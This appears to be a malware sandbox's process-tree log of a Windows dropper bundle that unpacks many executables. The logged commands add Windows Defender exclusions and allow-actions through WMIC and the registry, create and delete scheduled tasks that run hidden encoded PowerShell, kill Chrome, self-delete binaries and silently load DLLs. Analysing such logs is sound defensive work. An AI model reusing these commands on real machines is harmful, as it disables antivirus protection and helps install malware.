C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gbQFRyGUY" /SC once /ST 04:00:16 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="11⤵
- Creates scheduled task(s)
PID:4576
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gbQFRyGUY"11⤵PID:4536
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gbQFRyGUY"11⤵PID:4924
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bRciptYQhTCMvEFWGJ" /SC once /ST 05:10:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\nitzTrLPrXGkZCFFk\iXkrQovqyvDrylo\jyriYtZ.exe\" W8 /site_id 668658 /S" /V1 /F11⤵
- Creates scheduled task(s)
PID:3540
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True8⤵PID:4356
-
-
-
-
C:\Users\Admin\Documents\dZMsMKZgBGBQhqShGyzkfiYK.exe"C:\Users\Admin\Documents\dZMsMKZgBGBQhqShGyzkfiYK.exe"6⤵PID:2992
-
-
C:\Users\Admin\Documents\iAcjSOPol6Zs7BQJzJq61OGI.exe"C:\Users\Admin\Documents\iAcjSOPol6Zs7BQJzJq61OGI.exe"6⤵PID:3008
-
-
C:\Users\Admin\Documents\_M6vjYGkTU9A5vo4dgMIwiz8.exe"C:\Users\Admin\Documents\_M6vjYGkTU9A5vo4dgMIwiz8.exe"6⤵PID:2944
-
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"7⤵PID:3168
-
-
C:\Program Files (x86)\Company\NewProduct\cm3.exe"C:\Program Files (x86)\Company\NewProduct\cm3.exe"7⤵PID:3160
-
-
C:\Program Files (x86)\Company\NewProduct\inst001.exe"C:\Program Files (x86)\Company\NewProduct\inst001.exe"7⤵PID:3244
-
-
-
C:\Users\Admin\Documents\ByrLAYmGVRkkJ3zMOYqNKqGl.exe"C:\Users\Admin\Documents\ByrLAYmGVRkkJ3zMOYqNKqGl.exe"6⤵PID:2892
-
-
C:\Users\Admin\Documents\uQUIXK9_7mz11eCUu2GuFHR9.exe"C:\Users\Admin\Documents\uQUIXK9_7mz11eCUu2GuFHR9.exe"6⤵PID:2800
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun19262b9e49ad.exe4⤵
- Loads dropped DLL
PID:1316 -
C:\Users\Admin\AppData\Local\Temp\7zS4B632923\Sun19262b9e49ad.exeSun19262b9e49ad.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:984 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe6⤵PID:1936
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe7⤵
- Kills process with taskkill
PID:3656
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun193fda712d9f1.exe4⤵
- Loads dropped DLL
PID:1488 -
C:\Users\Admin\AppData\Local\Temp\7zS4B632923\Sun193fda712d9f1.exeSun193fda712d9f1.exe5⤵
- Executes dropped EXE
PID:1036
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun19e4ade31b2a.exe4⤵
- Loads dropped DLL
PID:856 -
C:\Users\Admin\AppData\Local\Temp\7zS4B632923\Sun19e4ade31b2a.exeSun19e4ade31b2a.exe5⤵
- Executes dropped EXE
PID:2036 -
C:\Users\Admin\AppData\Roaming\4985996.scr"C:\Users\Admin\AppData\Roaming\4985996.scr" /S6⤵PID:2820
-
-
C:\Users\Admin\AppData\Roaming\3579070.scr"C:\Users\Admin\AppData\Roaming\3579070.scr" /S6⤵PID:3056
-
-
C:\Users\Admin\AppData\Roaming\2190861.scr"C:\Users\Admin\AppData\Roaming\2190861.scr" /S6⤵PID:2028
-
C:\Users\Admin\AppData\Roaming\2190861.scr"C:\Users\Admin\AppData\Roaming\2190861.scr"7⤵PID:2384
-
-
C:\Users\Admin\AppData\Roaming\2190861.scr"C:\Users\Admin\AppData\Roaming\2190861.scr"7⤵PID:1672
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2028 -s 7807⤵
- Program crash
PID:1108
-
-
-
C:\Users\Admin\AppData\Roaming\4945762.scr"C:\Users\Admin\AppData\Roaming\4945762.scr" /S6⤵PID:1780
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun1908b94df837b3158.exe4⤵
- Loads dropped DLL
PID:1708 -
C:\Users\Admin\AppData\Local\Temp\7zS4B632923\Sun1908b94df837b3158.exeSun1908b94df837b3158.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1764
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun19de8ff4b6aefeb8.exe /mixone4⤵
- Loads dropped DLL
PID:1096 -
C:\Users\Admin\AppData\Local\Temp\7zS4B632923\Sun19de8ff4b6aefeb8.exeSun19de8ff4b6aefeb8.exe /mixone5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:704 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "Sun19de8ff4b6aefeb8.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS4B632923\Sun19de8ff4b6aefeb8.exe" & exit6⤵PID:1824
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "Sun19de8ff4b6aefeb8.exe" /f7⤵
- Kills process with taskkill
PID:2228
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun191101c1aaa.exe4⤵
- Loads dropped DLL
PID:1924 -
C:\Users\Admin\AppData\Local\Temp\7zS4B632923\Sun191101c1aaa.exeSun191101c1aaa.exe5⤵
- Executes dropped EXE
PID:1172 -
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"6⤵PID:2848
-
C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"7⤵PID:2948
-
-
C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"7⤵PID:2996
-
C:\ProgramData\5483344.exe"C:\ProgramData\5483344.exe"8⤵PID:2220
-
-
C:\ProgramData\3370718.exe"C:\ProgramData\3370718.exe"8⤵PID:3252
-
-
C:\ProgramData\2065615.exe"C:\ProgramData\2065615.exe"8⤵PID:3440
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3440 -s 7649⤵
- Program crash
PID:3984
-
-
C:\ProgramData\2065615.exe"C:\ProgramData\2065615.exe"9⤵PID:3796
-
-
-
C:\ProgramData\4251237.exe"C:\ProgramData\4251237.exe"8⤵PID:3248
-
-
-
C:\Users\Admin\AppData\Local\Temp\2.exe"C:\Users\Admin\AppData\Local\Temp\2.exe"7⤵PID:3040
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3040 -s 14288⤵
- Program crash
PID:2408
-
-
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"7⤵PID:1008
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "setup.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\setup.exe" & exit8⤵PID:2112
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "setup.exe" /f9⤵
- Kills process with taskkill
PID:4304
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\udptest.exe"C:\Users\Admin\AppData\Local\Temp\udptest.exe"7⤵PID:1844
-
-
C:\Users\Admin\AppData\Local\Temp\5.exe"C:\Users\Admin\AppData\Local\Temp\5.exe"7⤵PID:2344
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2344 -s 14288⤵
- Program crash
PID:3744
-
-
-
C:\Users\Admin\AppData\Local\Temp\LivelyScreenRecF18.exe"C:\Users\Admin\AppData\Local\Temp\LivelyScreenRecF18.exe"7⤵PID:2728
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2728 -s 8008⤵
- Program crash
PID:4124
-
-
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe"7⤵PID:2456
-
C:\Users\Admin\AppData\Local\Temp\is-N63B7.tmp\setup_2.tmp"C:\Users\Admin\AppData\Local\Temp\is-N63B7.tmp\setup_2.tmp" /SL5="$3010E,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"8⤵PID:3576
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT9⤵PID:3852
-
C:\Users\Admin\AppData\Local\Temp\is-UBOV8.tmp\setup_2.tmp"C:\Users\Admin\AppData\Local\Temp\is-UBOV8.tmp\setup_2.tmp" /SL5="$3022C,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT10⤵PID:2260
-
C:\Users\Admin\AppData\Local\Temp\is-1NRTF.tmp\postback.exe"C:\Users\Admin\AppData\Local\Temp\is-1NRTF.tmp\postback.exe" ss111⤵PID:4780
-
C:\Windows\SysWOW64\explorer.exeexplorer.exe ss112⤵PID:4440
-
C:\Windows\SysWOW64\cmd.execmd /C regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\hfNAOXRWo.dll"13⤵PID:4320
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32 /s "C:\Users\Admin\AppData\Local\Temp\hfNAOXRWo.dll"14⤵PID:4904
-
C:\Windows\system32\regsvr32.exe/s "C:\Users\Admin\AppData\Local\Temp\hfNAOXRWo.dll"15⤵PID:4832
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\hfNAOXRWo.dllgLnyzwmvz.dll"13⤵PID:5004
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32 /s "C:\Users\Admin\AppData\Local\Temp\hfNAOXRWo.dllgLnyzwmvz.dll"14⤵PID:956
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\3002.exe"C:\Users\Admin\AppData\Local\Temp\3002.exe"7⤵PID:3388
-
C:\Users\Admin\AppData\Local\Temp\3002.exe"C:\Users\Admin\AppData\Local\Temp\3002.exe" -a8⤵PID:3808
-
-
-
C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"7⤵PID:3564
-
-
C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"7⤵PID:3824
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun19eb40faaaa9.exe4⤵PID:1092
-
C:\Users\Admin\AppData\Local\Temp\7zS4B632923\Sun19eb40faaaa9.exeSun19eb40faaaa9.exe5⤵PID:1040
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun198361825f4.exe4⤵
- Loads dropped DLL
PID:1884 -
C:\Users\Admin\AppData\Local\Temp\7zS4B632923\Sun198361825f4.exeSun198361825f4.exe5⤵
- Executes dropped EXE
PID:2136 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2136 -s 7926⤵
- Program crash
PID:2132
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun1966fb31dd5a07.exe4⤵
- Loads dropped DLL
PID:432 -
C:\Users\Admin\AppData\Local\Temp\7zS4B632923\Sun1966fb31dd5a07.exeSun1966fb31dd5a07.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2108 -
C:\Users\Admin\AppData\Local\Temp\is-1N73J.tmp\Sun1966fb31dd5a07.tmp"C:\Users\Admin\AppData\Local\Temp\is-1N73J.tmp\Sun1966fb31dd5a07.tmp" /SL5="$2015C,247014,163328,C:\Users\Admin\AppData\Local\Temp\7zS4B632923\Sun1966fb31dd5a07.exe"6⤵
- Executes dropped EXE
PID:2320 -
C:\Users\Admin\AppData\Local\Temp\is-8MHTM.tmp\Ze2ro.exe"C:\Users\Admin\AppData\Local\Temp\is-8MHTM.tmp\Ze2ro.exe" /S /UID=burnerch27⤵PID:2564
-
C:\Program Files\Windows Mail\SNBBYRJSUA\ultramediaburner.exe"C:\Program Files\Windows Mail\SNBBYRJSUA\ultramediaburner.exe" /VERYSILENT8⤵PID:2856
-
-
C:\Users\Admin\AppData\Local\Temp\18-ea0f8-50a-838a2-ff6a1576b8888\Taeshobozhisae.exe"C:\Users\Admin\AppData\Local\Temp\18-ea0f8-50a-838a2-ff6a1576b8888\Taeshobozhisae.exe"8⤵PID:3052
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e69⤵PID:3420
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3420 CREDAT:275457 /prefetch:210⤵PID:4032
-
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad9⤵PID:4132
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4132 CREDAT:275457 /prefetch:210⤵PID:4852
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\9a-87681-0c2-0a487-69d118ed19f60\Nilykakacae.exe"C:\Users\Admin\AppData\Local\Temp\9a-87681-0c2-0a487-69d118ed19f60\Nilykakacae.exe"8⤵PID:2764
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ox5b4g3w.yuo\GcleanerEU.exe /eufive & exit9⤵PID:4172
-
C:\Users\Admin\AppData\Local\Temp\ox5b4g3w.yuo\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\ox5b4g3w.yuo\GcleanerEU.exe /eufive10⤵PID:3500
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "GcleanerEU.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\ox5b4g3w.yuo\GcleanerEU.exe" & exit11⤵PID:1772
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "GcleanerEU.exe" /f12⤵
- Kills process with taskkill
PID:4548
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vmjetnwh.t5f\installer.exe /qn CAMPAIGN="654" & exit9⤵PID:3712
-
C:\Users\Admin\AppData\Local\Temp\vmjetnwh.t5f\installer.exeC:\Users\Admin\AppData\Local\Temp\vmjetnwh.t5f\installer.exe /qn CAMPAIGN="654"10⤵PID:3524
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\21hlfz2q.iov\anyname.exe & exit9⤵PID:188
-
C:\Users\Admin\AppData\Local\Temp\21hlfz2q.iov\anyname.exeC:\Users\Admin\AppData\Local\Temp\21hlfz2q.iov\anyname.exe10⤵PID:3256
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bpdb4wb0.e2z\gcleaner.exe /mixfive & exit9⤵PID:4772
-
C:\Users\Admin\AppData\Local\Temp\bpdb4wb0.e2z\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\bpdb4wb0.e2z\gcleaner.exe /mixfive10⤵PID:3940
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "gcleaner.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\bpdb4wb0.e2z\gcleaner.exe" & exit11⤵PID:3244
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "gcleaner.exe" /f12⤵
- Kills process with taskkill
PID:4744
-
-
-
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun195a1614ec24e6a.exe4⤵
- Loads dropped DLL
PID:2040
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun1905815e51282417.exe4⤵
- Loads dropped DLL
PID:1636
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zS4B632923\Sun1905815e51282417.exeSun1905815e51282417.exe1⤵
- Executes dropped EXE
PID:1432
-
C:\Users\Admin\AppData\Local\Temp\7zS4B632923\Sun195a1614ec24e6a.exeSun195a1614ec24e6a.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1260
-
C:\Users\Admin\AppData\Local\Temp\is-7J8NP.tmp\ultramediaburner.tmp"C:\Users\Admin\AppData\Local\Temp\is-7J8NP.tmp\ultramediaburner.tmp" /SL5="$70172,281924,62464,C:\Program Files\Windows Mail\SNBBYRJSUA\ultramediaburner.exe" /VERYSILENT1⤵PID:1072
-
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu2⤵PID:4924
-
-
C:\Users\Admin\AppData\Local\Temp\E639.exeC:\Users\Admin\AppData\Local\Temp\E639.exe1⤵PID:2828
-
C:\Users\Admin\AppData\Local\Temp\4F87.exeC:\Users\Admin\AppData\Local\Temp\4F87.exe1⤵PID:2352
-
C:\Users\Admin\AppData\Local\Temp\4F87.exeC:\Users\Admin\AppData\Local\Temp\4F87.exe2⤵PID:1356
-
-
C:\Users\Admin\AppData\Local\Temp\75AD.exeC:\Users\Admin\AppData\Local\Temp\75AD.exe1⤵PID:1512
-
C:\Users\Admin\AppData\Local\Temp\DA4A.exeC:\Users\Admin\AppData\Local\Temp\DA4A.exe1⤵PID:1184
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Local\41d3c0b4-c914-4466-99f0-706a827f0d76" /deny *S-1-1-0:(OI)(CI)(DE,DC)1⤵
- Modifies file permissions
PID:3264
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1356 -s 13201⤵
- Program crash
PID:3012
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵PID:4116
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:676
-
C:\Users\Admin\AppData\Local\Temp\B445.exeC:\Users\Admin\AppData\Local\Temp\B445.exe1⤵PID:4120
-
C:\Users\Admin\AppData\Local\Temp\86B1.exeC:\Users\Admin\AppData\Local\Temp\86B1.exe1⤵PID:3632
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\86B1.exe"2⤵PID:4260
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK3⤵
- Delays execution with timeout.exe
PID:3416
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {235994D0-218F-40FC-85B9-F086A2E3A2B6} S-1-5-21-2375386074-2889020035-839874990-1000:AFOWCZMM\Admin:Interactive:[1]1⤵PID:3740
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵PID:4532
-
-
C:\Users\Admin\AppData\Roaming\fhhahbbC:\Users\Admin\AppData\Roaming\fhhahbb2⤵PID:4960
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵PID:3416
-
-
C:\Users\Admin\AppData\Local\Temp\nitzTrLPrXGkZCFFk\iXkrQovqyvDrylo\jyriYtZ.exeC:\Users\Admin\AppData\Local\Temp\nitzTrLPrXGkZCFFk\iXkrQovqyvDrylo\jyriYtZ.exe W8 /site_id 668658 /S1⤵PID:4664
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &2⤵PID:4428
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"3⤵PID:2512
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True4⤵PID:912
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True5⤵PID:2288
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True6⤵PID:4588
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"3⤵PID:1040
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"3⤵PID:2512
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True4⤵PID:956
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True5⤵PID:4344
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True6⤵PID:2436
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"3⤵PID:4384
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gBBsqFqgL" /SC once /ST 00:42:01 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
PID:3108
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gBBsqFqgL"2⤵PID:1116
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gBBsqFqgL"2⤵PID:4452
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\nyFjvKGtfVGLAKAU" /t REG_DWORD /d 0 /reg:322⤵PID:3808
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\nyFjvKGtfVGLAKAU" /t REG_DWORD /d 0 /reg:323⤵PID:5036
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\nyFjvKGtfVGLAKAU" /t REG_DWORD /d 0 /reg:642⤵PID:1116
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\nyFjvKGtfVGLAKAU" /t REG_DWORD /d 0 /reg:643⤵PID:3404
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\nyFjvKGtfVGLAKAU" /t REG_DWORD /d 0 /reg:322⤵PID:4548
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\nyFjvKGtfVGLAKAU" /t REG_DWORD /d 0 /reg:323⤵PID:4540
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\nyFjvKGtfVGLAKAU" /t REG_DWORD /d 0 /reg:642⤵PID:1600
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\nyFjvKGtfVGLAKAU" /t REG_DWORD /d 0 /reg:643⤵PID:1376
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C copy nul "C:\Windows\Temp\nyFjvKGtfVGLAKAU\CsmpMeZI\UMqQYyyOllJmLzNS.wsf"2⤵PID:1908
-
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\nyFjvKGtfVGLAKAU\CsmpMeZI\UMqQYyyOllJmLzNS.wsf"2⤵PID:3180
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NMbcPgNClKinC" /t REG_DWORD /d 0 /reg:323⤵PID:3904
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NMbcPgNClKinC" /t REG_DWORD /d 0 /reg:643⤵PID:2224
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\STjmdXhOU" /t REG_DWORD /d 0 /reg:323⤵PID:3296
-
-
